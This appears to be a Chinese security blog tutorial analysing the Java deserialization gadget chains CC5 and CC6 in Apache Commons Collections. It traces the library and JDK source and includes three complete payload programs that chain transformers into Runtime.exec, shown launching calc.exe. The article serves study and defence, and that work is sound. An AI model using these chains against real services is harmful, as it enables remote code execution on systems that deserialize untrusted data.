热门标签
热门文章
- 1Tesseract OCR 训练字库_tesseract训练自己的字库
- 2数组和广义表 讲义实现_数组与广义表基本操作c
- 3提升开发安全5大成熟度 跨国企业落地默安“一站式”方案_开发安全能力提升
- 4排序算法案例_郑州航空大学
- 5SpringCloud之Gateway(服务网关)_springcloud 查看 gateway 是否生效
- 6还在用HttpUtil?SpringBoot 3.0全新HTTP客户端工具来了,用起来够优雅~_spring 新版本自带的 http 客户端工具
- 7华为昇腾AI芯片加持,9.1k Star 的 Open-Sora-Plan,国产Sora要来了吗_opensora-plan
- 8深度学习(十一):YOLOv9之最新的目标检测器解读_yolov9 智慧 检测
- 9在iOS设备上演示Axure原型的方法
- 107套干货,Python常用技术学习知识图谱!!(史上最全,建议收藏(2)
当前位置: article > 正文
11-java安全——java反序列化CC5和CC6链分析_cc5反序列化
作者:小蓝xlanll | 2024-06-09 15:46:19
赞
踩
cc5反序列化
CC5链分析
复习LazyMap利用链: https://blog.csdn.net/qq_35733751/article/details/118462281
在学习CC2链时我们知道由于JDK8版本改写了AnnotationInvocationHandler类的readobject方法,CC1链中LazyMap的get方法已经无法使用,CC5链使用了BadAttributeValueExpException类来代替AnnotationInvocationHandler类,并且还用了一个新的类来调用LazyMap的get方法。
CC5链的payload代码:
- package com.cc;
-
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.keyvalue.TiedMapEntry;
- import org.apache.commons.collections.map.LazyMap;
-
- import javax.management.BadAttributeValueExpException;
- import java.io.ByteArrayInputStream;
- import java.io.ByteArrayOutputStream;
- import java.io.ObjectInputStream;
- import java.io.ObjectOutputStream;
- import java.lang.reflect.Field;
- import java.util.HashMap;
-
- public class CC5Test {
- public static void main(String[] args) throws Exception {
-
- //构造核心利用代码
- Transformer[] transformers = new Transformer[]{
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
- new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
- new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
- };
-
- //构造利用链
- ChainedTransformer chain = new ChainedTransformer(transformers);
-
- //触发连
- HashMap hashMap = new HashMap();
- LazyMap lazymap = (LazyMap) LazyMap.decorate(hashMap, chain);
- //将lazyMap传给TiedMapEntry
- TiedMapEntry entry = new TiedMapEntry(lazymap, "test");
- //反射调用TiedMapEntry
- BadAttributeValueExpException bad = new BadAttributeValueExpException(null);
- Field val = bad.getClass().getDeclaredField("val");
- val.setAccessible(true);
- val.set(bad,entry);
-
- //序列化 --> 反序列化
- ByteArrayOutputStream barr = new ByteArrayOutputStream();
- ObjectOutputStream oos = new ObjectOutputStream(barr);
- oos.writeObject(bad);
- oos.close();
- ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
- ois.readObject();
- }
- }
CC5链构造核心利用代码和利用链还是和CC1链一样没啥区别,我们主要关注后面是如何触发利用链。在构造触发链时还是用到了LazyMap类,但不同的是使用了一个新的类TiedMapEntry来调用LazyMap链,然后将TiedMapEntry类又传给了BadAttributeValueExpException类的val属性。
先来看TiedMapEntry类,该类实现了Serializable接口,在getValue方法并通过map属性调用了一个get方法
- public Object getValue() {
- return map.get(key);
- }
map属性是通过TiedMapEntry类的构造来赋值的(map属性是可控的),可以把LazyMap当做TiedMapEntry类的构造参数传给map属性。
- public TiedMapEntry(Map map, Object key) {
- super();
- this.map = map;
- this.key = key;
- }
这样就可以让TiedMapEntry类map属性来间接调用LazyMap类的get方法,从而触发之前构造的利用链了。
而getValue方法是在toString方法中被调用
- public String toString() {
- return getKey() + "=" + getValue();
- }
现在我们要思考的是如何调用TiedMapEntry类的toString?于是接下来需要找到一个类必须满足以下条件:
- 重写readObject方法
- 并在readObject方法中可以调用toString方法(并且调用toString方法的对象是可控的)
于是接下来我们找到一个BadAttributeValueExpException类:
- public class BadAttributeValueExpException extends Exception {
- /* Serial version */
- private static final long serialVersionUID = -3105272988410493376L;
-
- /**
- * @serial A string representation of the attribute that originated this exception.
- * for example, the string value can be the return of {@code attribute.toString()}
- */
- private Object val;
-
- /**
- * Constructs a BadAttributeValueExpException using the specified Object to
- * create the toString() value.
- *
- * @param val the inappropriate value.
- */
- public BadAttributeValueExpException (Object val) {
- this.val = val == null ? null : val.toString();
- }
-
-
- /**
- * Returns the string representing the object.
- */
- public String toString() {
- return "BadAttributeValueException: " + val;
- }
-
- private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
- //从流中读取字段
- ObjectInputStream.GetField gf = ois.readFields();
- //从流中读取val属性
- Object valObj = gf.get("val", null);
-
- if (valObj == null) {
- val = null;
- } else if (valObj instanceof String) {
- val= valObj;
- } else if (System.getSecurityManager() == null
- || valObj instanceof Long
- || valObj instanceof Integer
- || valObj instanceof Float
- || valObj instanceof Double
- || valObj instanceof Byte
- || valObj instanceof Short
- || valObj instanceof Boolean) {
- //相当于属性val调用toString方法
- val = valObj.toString();
- } else { // the serialized object is from a version without JDK-8019292 fix
- val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
- }
- }
- }
readFields方法表示从输入流中读取字段,然后gf对象调用了get方法读取val属性,然后又调用了toString方法,val的内容同样是可控的,因此这里可以通过反射将val属性设置为TiedMapEntry类,这样就可以调用TiedMapEntry类的toString方法了,这样就可以触发利用链和核心利用代码。
CC5利用链流程:
CC6链分析
CC6链用到了很多关于集合的知识,如果你对集合不熟悉的话,想要理解CC6链的构造原理可能比较费劲,建议先复习一下集合的知识:8-java安全基础——HashSet,HashMap源码分析
TiedMapEntry类中有两个方法都调用了getValue方法,CC5链是通过toString方法调用getValue方法从而触发LazyMap,而在CC6链中则是通过hashCode方法来调用getValue方法。
- public Object getValue() {
- return map.get(key);
- }
-
- public String toString() {
- return getKey() + "=" + getValue();
- }
-
-
- public int hashCode() {
- Object value = getValue();
- return (getKey() == null ? 0 : getKey().hashCode()) ^
- (value == null ? 0 : value.hashCode());
- }
我们要找哪些地方调用了hashCode方法,然后再hashMap中找到一个hash方法,并且在该方法中调用了一个hashCode方法,参数k是通过put方法传递的,分析参数key是否可控。
- final int hash(Object k) {
- int h = hashSeed;
- if (0 != h && k instanceof String) {
- return sun.misc.Hashing.stringHash32((String) k);
- }
- //调用hashcode方法
- h ^= k.hashCode();
-
- // This function ensures that hashCodes that differ only by
- // constant multiples at each bit position have a bounded
- // number of collisions (approximately 8 at default load factor).
- h ^= (h >>> 20) ^ (h >>> 12);
- return h ^ (h >>> 7) ^ (h >>> 4);
- }
而hash方法是在put方法中被调用,HashMap每次调用put方法都会调用hash方法计算hash值。
- public V put(K key, V value) {
- if (table == EMPTY_TABLE) {
- inflateTable(threshold);
- }
- if (key == null)
- return putForNullKey(value);
- //计算hash值
- //调用hash方法
- int hash = hash(key);
- int i = indexFor(hash, table.length);
- for (Entry<K,V> e = table[i]; e != null; e = e.next) {
- Object k;
- if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {
- V oldValue = e.value;
- e.value = value;
- e.recordAccess(this);
- return oldValue;
- }
- }
-
- modCount++;
- addEntry(hash, key, value, i);
- return null;
- }
利用链构造完了,接下来需要找到一个触发利用链的地方(重写了readObject方法同时又调用了put方法的地方),正好有一个HashSet集合满足条件,hashSet重写了writeObject和readObject方法实现自定义序列化与反序列化
- //序列化
- private void writeObject(java.io.ObjectOutputStream s)
- throws java.io.IOException {
- // Write out any hidden serialization magic
- s.defaultWriteObject();
-
- // Write out HashMap capacity and load factor
- s.writeInt(map.capacity());
- s.writeFloat(map.loadFactor());
-
- // Write out size
- s.writeInt(map.size());
-
- //将元素依次序列化
- for (E e : map.keySet())
- s.writeObject(e);
- }
-
- //反序列化
- private void readObject(java.io.ObjectInputStream s) throws java.io.IOException, ClassNotFoundException {
- // Read in any hidden serialization magic
- s.defaultReadObject();
-
- // Read in HashMap capacity and load factor and create backing HashMap
- int capacity = s.readInt();
- float loadFactor = s.readFloat();
- map = (((HashSet)this) instanceof LinkedHashSet ?
- new LinkedHashMap<E,Object>(capacity, loadFactor) :
- new HashMap<E,Object>(capacity, loadFactor));
-
- // Read in size
- int size = s.readInt();
-
- // Read in all elements in the proper order.
- for (int i=0; i<size; i++) {
- //依次将元素还原成java对象(反序列化)
- E e = (E) s.readObject();
- //将java对象传给put方法
- map.put(e, PRESENT);
- }
- }
writeObject方法中会将hashSet集合中的元素依次取出来序列化,readObject方法会判断当前HashSet对象是否为LinkedHashSet,如果不是则直接返回HashMap,接着从流中读取hashSet集合中的元素并还原成java对象,然后将java对象作为参数key传给put方法,自定义序列化和反序列化过程中的hashSet集合中的元素是可控的,如果在hashSet集合中添加TiedMapEntry对象元素,这样就能控制put方法中的key了。
分析hashSet集合add方法底层实现后发现add方法底层调用了map.put方法,并且在putVal方法内部将key传给了Node。
- final V putVal(int hash, K key, V value, boolean onlyIfAbsent,boolean evict) {
- Node<K,V>[] tab; Node<K,V> p; int n, i;
- if ((tab = table) == null || (n = tab.length) == 0)
- //resize方法会返回table属性的引用
- n = (tab = resize()).length;
- if ((p = tab[i = (n - 1) & hash]) == null)
- //将key传给Node
- tab[i] = newNode(hash, key, value, null);
- else {
- Node<K,V> e; K k;
- if (p.hash == hash &&
- ((k = p.key) == key || (key != null && key.equals(k))))
- e = p;
- else if (p instanceof TreeNode)
- e = ((TreeNode<K,V>)p).putTreeVal(this, tab, hash, key, value);
- else {
- for (int binCount = 0; ; ++binCount) {
- if ((e = p.next) == null) {
- p.next = newNode(hash, key, value, null);
- if (binCount >= TREEIFY_THRESHOLD - 1) // -1 for 1st
- treeifyBin(tab, hash);
- break;
- }
- if (e.hash == hash &&
- ((k = e.key) == key || (key != null && key.equals(k))))
- break;
- p = e;
- }
- }
- if (e != null) { // existing mapping for key
- V oldValue = e.value;
- if (!onlyIfAbsent || oldValue == null)
- e.value = value;
- afterNodeAccess(e);
- return oldValue;
- }
- }
- ++modCount;
- if (++size > threshold)
- resize();
- afterNodeInsertion(evict);
- return null;
- }
Node创建了一个实例
- Node<K,V> newNode(int hash, K key, V value, Node<K,V> next) {
- return new Node<>(hash, key, value, next);
- }
然后将hashSet集合添加的元素给了Node对象的key属性
- Node(int hash, K key, V value, Node<K,V> next) {
- this.hash = hash;
- //将key赋值给key属性
- this.key = key;
- this.value = value;
- this.next = next;
- }
返回到putVal方法中,该方法会将Node对象(key/value键值对)赋给一个Node<K,V>[]类型的tab数组(tab实际上是由resize方法返回的table属性引用),即HashMap的table属性,因为hashSet集合添加元素底层用到了HashMap集合,而HashMap会把元素以Node进行存储。
经过分析之后发现hashSet集合的add方法底层还是调用了map.put方法,控制put方法中的参数key的思路有两种:
方式一:往hashSet集合中直接添加TiedMapEntry对象。
方式二:是通过反射先从hashSet集合中获取map属性所指向的hashmap对象,然后再从hashmap中获取table属性中的Node对象,最后将Node对象中的key属性修改为TiedMapEntry对象,Node为啥能接收Entry?这明明是两个完全不同类型的对象,如果你对于HashMap底层实现非常了解的话,相信这一点对你来说应该不难理解,其实主要是因为Node实现了Entry接口。
以上方式都可以构造利用链,在yseoserial工具CC6链中是使用第二种方式。
CC6链的payload代码:
- package com.cc;
-
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.keyvalue.TiedMapEntry;
- import org.apache.commons.collections.map.LazyMap;
-
- import java.io.*;
- import java.lang.reflect.Field;
- import java.util.HashMap;
- import java.util.HashSet;
-
- public class CC6Test1 {
- public static void main(String[] args) throws Exception {
-
- Transformer[] transformers = new Transformer[]{
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
- new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
- new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),
- };
-
- ChainedTransformer chain = new ChainedTransformer(transformers);
- HashMap hashMap = new HashMap();
- LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap, chain);
- TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "foo");
-
- HashSet hashSet = new HashSet(1);
- hashSet.add("foo");
- //获取HashSet的map属性
- Field field = hashSet.getClass().getDeclaredField("map");
- field.setAccessible(true);
- //获取HashSet集合中的map属性的hashmap对象
- HashMap hashset_map = (HashMap)field.get(hashSet);
-
- //获取HashMap的table属性
- field = HashMap.class.getDeclaredField("table");
- field.setAccessible(true);
- //从hashmap对象中获取table属性的值(返回的是一个HashMap.Node类型的数组)
- Object[] array = (Object[]) field.get(hashset_map);
- Object node = array[0];
- if(node == null){
- node = array[1];
- }
- Field keyField = null;
- //获取HashMap.Node类中的key属性
- keyField = node.getClass().getDeclaredField("key");
- keyField.setAccessible(true);
- //然后将HashMap.Node类中的key属性设置为TiedMapEntry对象
- keyField.set(node, tiedMapEntry);
-
- //序列化 --> 反序列化
- ByteArrayOutputStream barr = new ByteArrayOutputStream();
- ObjectOutputStream oos = new ObjectOutputStream(barr);
- oos.writeObject(hashSet);
- oos.close();
- ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
- ois.readObject();
- }
- }
关于方式一中往hashSet集合中直接添加TiedMapEntry对象,最终代码如下:
- package com.cc;
-
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.keyvalue.TiedMapEntry;
- import org.apache.commons.collections.map.LazyMap;
-
- import java.io.*;
- import java.util.HashMap;
- import java.util.HashSet;
- /*
- 方式一:往hashSet集合中直接添加TiedMapEntry对象。
- */
- public class CC6Test2 {
- public static void main(String[] args) throws Exception {
-
- Transformer[] transformers = new Transformer[]{
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
- new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
- new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),
- };
-
- ChainedTransformer chain = new ChainedTransformer(transformers);
-
- HashMap hashMap = new HashMap();
- LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap, chain);
- TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "foo");
- //直接向Set集合中添加TiedMapEntry,触发利用链
- HashSet hashSet = new HashSet(1);
- hashSet.add(tiedMapEntry);
-
- ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("ser2.out"));
- outputStream.writeObject(hashSet);
- outputStream.close();
-
- ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("ser2.out"));
- inputStream.readObject();
- }
- }
总体来说,方式二的利用链的构造比方式一要复杂很多。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/694763
推荐阅读
相关标签
